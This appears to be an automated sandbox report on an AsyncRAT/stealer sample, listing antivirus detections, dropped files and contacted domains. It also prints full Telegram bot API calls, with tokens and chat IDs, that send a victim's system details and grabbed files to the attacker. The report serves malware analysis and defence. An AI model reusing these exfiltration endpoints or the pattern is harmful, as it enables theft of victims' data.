                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    zrrHgsDzgS.exe87%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
                    zrrHgsDzgS.exe82%VirustotalBrowse
                    zrrHgsDzgS.exe100%AviraTR/Dropper.Gen
                    zrrHgsDzgS.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\udwnme.exe79%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
                    C:\Users\user\AppData\Roaming\svchost.exe87%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    api.mylnikov.org3%VirustotalBrowse
                    api.telegram.org2%VirustotalBrowse
                    pastebin.com0%VirustotalBrowse
                    icanhazip.com0%VirustotalBrowse
                    107.143.13.0.in-addr.arpa0%VirustotalBrowse
                    206.23.85.13.in-addr.arpa1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://support.mozilla.org0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%Avira URL Cloudsafe
                    https://api.telegram.org/bot1%VirustotalBrowse
                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                    https://api.telegram.org1%VirustotalBrowse
                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                    https://api.telegram.orgD0%Avira URL Cloudsafe
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True0%Avira URL Cloudsafe
                    http://icanhazip.com/0%Avira URL Cloudsafe
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d0%Avira URL Cloudsafe
                    http://icanhazip.com/0%VirustotalBrowse
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True0%Avira URL Cloudsafe
                    https://pastebin.com/raw/7B75u64Bd0%Avira URL Cloudsafe
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=579540%Avira URL Cloudsafe
                    https://github.com/LimerBoy/StormKitty0%Avira URL Cloudsafe
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=57950%Avira URL Cloudsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%Avira URL Cloudsafe
                    https://api.mylnikov.org0%Avira URL Cloudsafe
                    http://api.telegram.orgd0%Avira URL Cloudsafe
                    https://github.com/LimerBoy/StormKitty2%VirustotalBrowse
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=57954804690%Avira URL Cloudsafe
                    http://icanhazip.com0%Avira URL Cloudsafe
                    https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=52830%Avira URL Cloudsafe
                    https://api.mylnikov.org3%VirustotalBrowse
                    https://github.com/LimerBoy/StormKittyTCfq$0%Avira URL Cloudsafe
                    https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.130%Avira URL Cloudsafe
                    http://icanhazip.com0%VirustotalBrowse
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...0%Avira URL Cloudsafe
                    https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.139%VirustotalBrowse
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:150%Avira URL Cloudsafe
                    https://github.com/LimerBoy/StormKitty0&nq0%Avira URL Cloudsafe
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    http://pastebin.comd0%Avira URL Cloudsafe
                    https://github.com/LimerBoy/StormKitty0&nq3%VirustotalBrowse
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%Avira URL Cloudsafe
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=1%VirustotalBrowse
                    https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=52836629560%Avira URL Cloudsafe
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...1%VirustotalBrowse
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=579540%Avira URL Cloudsafe
                    http://icanhazip.comd0%Avira URL Cloudsafe
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...0%Avira URL Cloudsafe
                    http://icanhazip.com/t0%Avira URL Cloudsafe
                    https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=52831%VirustotalBrowse
                    https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=52836629560%VirustotalBrowse
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&0%Avira URL Cloudsafe
                    https://api.tele0%Avira URL Cloudsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%VirustotalBrowse
                    http://icanhazip.com/t0%VirustotalBrowse
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage0%Avira URL Cloudsafe
                    http://api.mylnikov.orgd0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                    https://api.telegram.org/file/bot0%Avira URL Cloudsafe
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&0%VirustotalBrowse
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%Avira URL Cloudsafe
                    http://api.telegram.org0%Avira URL Cloudsafe
                    http://api.mylnikov.org0%Avira URL Cloudsafe
                    https://api.telegram.org/file/bot0%VirustotalBrowse
                    http://pastebin.com0%Avira URL Cloudsafe
                    https://pastebin.com0%Avira URL Cloudsafe
                    https://pastebin.com/raw/7B75u64B0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.mylnikov.org
                    		104.21.44.66
                    		truefalseunknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrueunknown
                    pastebin.com
                    		104.20.4.235
                    		truetrueunknown
                    icanhazip.com
                    		104.16.184.241
                    		truefalseunknown
                    107.143.13.0.in-addr.arpa
                    		unknown
                    		unknowntrueunknown
                    206.23.85.13.in-addr.arpa
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=Truefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://icanhazip.com/false
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=Truefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469false
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...false
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15false
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956false
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...false
                    • Avira URL Cloud: safe
                    		unknown
                    https://pastebin.com/raw/7B75u64Bfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabtmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFtmpAE3C.tmp.dat.28.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.orgudwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A85000.00000004.00000800.00020000.00000000.sdmptrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/botluglzv.exe.7.drtrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.orgDluglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15dudwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17History.txt0.15.dr, tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr, History.txt0.28.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://pastebin.com/raw/7B75u64Bdluglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=57954udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/LimerBoy/StormKittyluglzv.exe, 0000001C.00000002.2919353202.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe.7.dr, luglzv.exe.7.drfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installtmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.mylnikov.orgudwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A58000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://api.telegram.orgdudwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://icanhazip.comudwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namezrrHgsDzgS.exe, 00000000.00000002.1725732577.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, udwnme.exe.7.dr, luglzv.exe.7.drfalse
                    • 9%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/LimerBoy/StormKittyTCfq$udwnme.exe, 0000000F.00000002.2919317603.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/LimerBoy/StormKitty0&nqudwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A16000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pastebin.comdluglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016History.txt0.15.dr, tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr, History.txt0.28.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=57954luglzv.exe, 0000001C.00000002.2919353202.0000000002A85000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://icanhazip.comdudwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmpAE3C.tmp.dat.28.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://icanhazip.com/tudwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.mylnikov.org/geolocation/wifi?v=1.1&udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.teleudwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessageudwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
